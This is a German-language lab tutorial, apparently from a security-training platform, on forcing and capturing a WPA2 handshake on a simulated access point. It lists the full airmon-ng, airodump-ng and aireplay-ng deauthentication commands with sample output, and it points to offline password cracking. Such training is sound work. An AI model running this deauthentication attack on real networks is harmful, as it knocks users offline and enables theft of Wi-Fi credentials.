Einleitung
Willkommen zu diesem Lab über das Erzwingen einer WPA-Handshake-Erfassung. Der WPA/WPA2-Vier-Wege-Handshake ist eine kritische Datenmenge, die benötigt wird, um zu versuchen, das Passwort eines Wi-Fi-Netzwerks zu knacken. Während Sie passiv darauf warten können, dass sich ein Gerät mit dem Netzwerk verbindet, um diesen Handshake zu erfassen, kann dies zeitaufwendig sein.
Ein aktiverer Ansatz besteht darin, einen aktuell verbundenen Client zum Trennen und sofortigen Wiederverbinden zu zwingen. Dieser Vorgang wird als Deauthentifizierungs- (oder "Deauth"-) Angriff bezeichnet. Wenn sich der Client wieder verbindet, führt er den Vier-Wege-Handshake durch, den Sie dann erfassen können.
In diesem Lab verwenden Sie aireplay-ng, ein leistungsstarkes Werkzeug aus der aircrack-ng-Suite, um einen Deauthentifizierungsangriff auf einen simulierten Wi-Fi-Client durchzuführen. Dies ermöglicht Ihnen, den WPA-Handshake zuverlässig zur Analyse zu erfassen. Unsere Laborumgebung wurde mit einem virtuellen drahtlosen Zugriffspunkt (AP) namens MyTestAP und einem verbundenen Client vorkonfiguriert.
Identifizieren eines verbundenen Clients aus einem airodump-ng Scan
In diesem Schritt bereiten Sie Ihre drahtlose Schnittstelle für die Überwachung vor und verwenden dann airodump-ng, um den Zielzugangspunkt und seinen verbundenen Client zu finden.
Zuerst müssen Sie eine Ihrer virtuellen drahtlosen Schnittstellen in den Monitor-Modus versetzen. Dieser Modus ermöglicht es der Schnittstelle, den gesamten Wi-Fi-Verkehr in der Luft zu erfassen, nicht nur den Verkehr, der an sie gerichtet ist. Wir werden die Schnittstelle wlan1 verwenden.
Führen Sie den folgenden Befehl aus, um den Monitor-Modus auf wlan1 zu starten:
sudo airmon-ng start wlan1
Dieser Befehl erstellt eine neue Monitor-Schnittstelle, die normalerweise wlan1mon genannt wird. Sie sollten eine Ausgabe sehen, die bestätigt, dass der Modus aktiviert wurde.
PHY Interface Driver Chipset
phy0 wlan0 mac80211_hwsim Software simulator
phy1 wlan1 mac80211_hwsim Software simulator
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)
Führen Sie nun airodump-ng auf der neuen Monitor-Schnittstelle (wlan1mon) aus, um mit dem Scannen zu beginnen. Wir verwenden das Flag -w, um die erfassten Pakete in eine Datei namens capture zu schreiben, und geben die BSSID und den Kanal unseres Ziel-AP an, um den Scan zu fokussieren. Die BSSID für unseren simulierten AP ist 02:00:00:00:01:00 und er befindet sich auf Kanal 6.
sudo airodump-ng -w capture --bssid 02:00:00:00:01:00 -c 6 wlan1mon
Lassen Sie airodump-ng laufen. Sie sehen einen Bildschirm, der sich in Echtzeit aktualisiert. Der obere Teil listet die umliegenden Zugangspunkte auf, und der untere Teil listet die mit ihnen verbundenen Clients auf. Sie sollten unseren AP, MyTestAP, und einen damit verbundenen Client sehen.
Die Ausgabe wird in etwa so aussehen:
CH 6 ][ Elapsed: 10 s ][ 2023-10-27 10:30
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 10 5 0 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -35 0- 1 0 5
Identifizieren und notieren Sie aus dieser Ausgabe:
- BSSID:
02:00:00:00:01:00(Die MAC-Adresse des AP). - STATION:
02:00:00:00:02:00(Die MAC-Adresse des verbundenen Clients).
Lassen Sie dieses Terminal laufen. Sie werden es später benötigen, um die Erfassung des Handshakes zu bestätigen.
Öffnen eines neuen Terminals für den Deauthentifizierungsangriff
In diesem Schritt öffnen Sie ein neues Terminalfenster. Der airodump-ng-Befehl aus dem vorherigen Schritt muss im ersten Terminal weiterlaufen, um auf den WPA-Handshake zu warten. Der Deauthentifizierungsangriff wird von einem zweiten, separaten Terminal aus gestartet.
Um ein neues Terminal zu öffnen, klicken Sie auf das +-Symbol in der Terminal-Tab-Leiste oben im Terminalfenster.

Sobald das neue Terminal geöffnet ist, befinden Sie sich im Verzeichnis ~/project und sind bereit, den Angriffsbefehl im nächsten Schritt auszuführen. Alle nachfolgenden Befehle für den Angriff selbst sollten in diesem neuen Terminal ausgeführt werden.
Erstellen des aireplay-ng Deauth-Befehls mit --deauth
In diesem Schritt erstellen Sie den aireplay-ng-Befehl, der den Deauthentifizierungsangriff durchführt. Sie verwenden die Informationen, die Sie in Schritt 1 gesammelt haben.
Die grundlegende Syntax für einen Deauth-Angriff mit aireplay-ng lautet:
aireplay-ng --deauth <anzahl_pakete> -a <AP_BSSID> -c <Client_STATION> <schnittstelle>
Lassen Sie uns die Komponenten aufschlüsseln:
--deauth: Dieses Flag gibt den Deauthentifizierungsangriffsmodus an.<anzahl_pakete>: Dies ist die Anzahl der zu sendenden Deauth-Pakete. Das Senden eines kleinen Bursts, wie z. B.5, reicht normalerweise aus, um den Client zu trennen.-a <AP_BSSID>: Dies gibt die MAC-Adresse des Ziel-Access-Points an. Aus Schritt 1 ist dies02:00:00:00:01:00.-c <Client_STATION>: Dies gibt die MAC-Adresse des Clients an, den Sie trennen möchten. Aus Schritt 1 ist dies02:00:00:00:02:00.<schnittstelle>: Dies ist Ihre drahtlose Schnittstelle im Monitor-Modus, nämlichwlan1mon.
Stellen Sie nun den vollständigen Befehl in Ihrem neuen Terminal zusammen. Er sollte genau so aussehen:
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
Drücken Sie noch nicht Enter. Im nächsten Schritt führen Sie diesen Befehl aus.
Ausführen des Angriffs auf den Client und den AP
In diesem Schritt führen Sie den gerade erstellten Befehl aus, um den Angriff zu starten.
Drücken Sie in Ihrem zweiten Terminalfenster die Eingabetaste (Enter), um den aireplay-ng-Befehl auszuführen.
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
Das Tool beginnt sofort mit dem Senden von Deauthentifizierungs-Paketen. Die Ausgabe zeigt die Uhrzeit und dass gerichtete Deauths an den Client gesendet werden.
Die Ausgabe wird wie folgt aussehen:
10:35:10 Waiting for beacon frame (BSSID: 02:00:00:00:01:00) on channel 6
10:35:10 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
10:35:11 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
...
Der Angriff ist sehr schnell. Sobald Sie den Befehl ausführen, wird der anvisierte Client vom Netzwerk getrennt und versucht sofort, sich wieder zu verbinden. Dieser Wiederverbindungsprozess generiert den WPA-Handshake, den wir erfassen möchten.
Wechseln Sie schnell zurück zu Ihrem ersten Terminal (dem, auf dem airodump-ng läuft), um das Ergebnis im nächsten Schritt zu beobachten.
Bestätigen der Handshake-Erfassung im airodump-ng-Fenster
In diesem Schritt bestätigen Sie den Erfolg des Deauthentifizierungsangriffs, indem Sie die WPA-Handshake-Nachricht in Ihrem airodump-ng-Fenster überprüfen.
Wechseln Sie zurück zu Ihrem ersten Terminal. Wenn der Angriff funktioniert hat, sehen Sie in der oberen rechten Ecke der airodump-ng-Anzeige eine neue Nachricht:
WPA handshake: 02:00:00:00:01:00
Diese Nachricht bestätigt, dass airodump-ng den Vier-Wege-Handshake für die angegebene BSSID erfolgreich abgefangen und aufgezeichnet hat.
CH 6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 02:00:00:00:01:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 48 82 1 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -36 0- 1 0 75
Nachdem Sie nun den Handshake haben, können Sie die Erfassung stoppen. Drücken Sie Strg+C im airodump-ng-Terminal, um ihn zu beenden.
Da Sie in Schritt 1 das Flag -w capture verwendet haben, hat airodump-ng den erfassten Datenverkehr in Dateien in Ihrem aktuellen Verzeichnis (~/project) gespeichert. Listen Sie die Dateien auf, um die Ergebnisse zu sehen.
ls -l
Sie sollten mehrere Dateien sehen, die mit capture beginnen, einschließlich capture-01.cap. Diese .cap-Datei enthält die rohen Paketdaten, einschließlich des gerade erfassten WPA-Handshakes.
-rw-r--r-- 1 root root 450 Oct 27 10:36 capture-01.cap
-rw-r--r-- 1 root root 892 Oct 27 10:36 capture-01.csv
-rw-r--r-- 1 root root 634 Oct 27 10:36 capture-01.kismet.csv
-rw-r--r-- 1 root root 128 Oct 27 10:36 capture-01.kismet.netxml
-rw-r--r-- 1 labex labex 121 Oct 27 10:28 hostapd.conf
-rw-r--r-- 1 labex labex 52 Oct 27 10:28 wpa_supplicant.conf
Die Datei capture-01.cap ist der Hauptgewinn. Sie kann nun mit Tools zur Passwortknackung wie aircrack-ng verwendet werden, um den Pre-Shared Key des Netzwerks zu ermitteln.
Zusammenfassung
Herzlichen Glückwunsch zum Abschluss dieses Labs! Sie haben erfolgreich einen Deauthentifizierungsangriff durchgeführt, um einen WPA-Handshake zu erzwingen und zu erfassen.
In diesem Lab haben Sie gelernt, wie Sie:
- Eine drahtlose Schnittstelle in den Monitor-Modus versetzen mit
airmon-ng. - Ein Ziel-AP und einen Client mit
airodump-ngscannen und identifizieren. - Einen Deauthentifizierungsangriff mit
aireplay-ngkonstruieren und ausführen. - Die Erfassung des WPA-Handshakes bestätigen und die resultierende
.cap-Datei lokalisieren.
Dies ist eine grundlegende Fähigkeit im Bereich der drahtlosen Netzwerksicherheitstests. Die erfasste Handshake-Datei ist die Schlüsselkomponente für die nächste Phase: das Offline-Passwort-Cracking mit einem Tool wie aircrack-ng und einer umfassenden Wortliste.
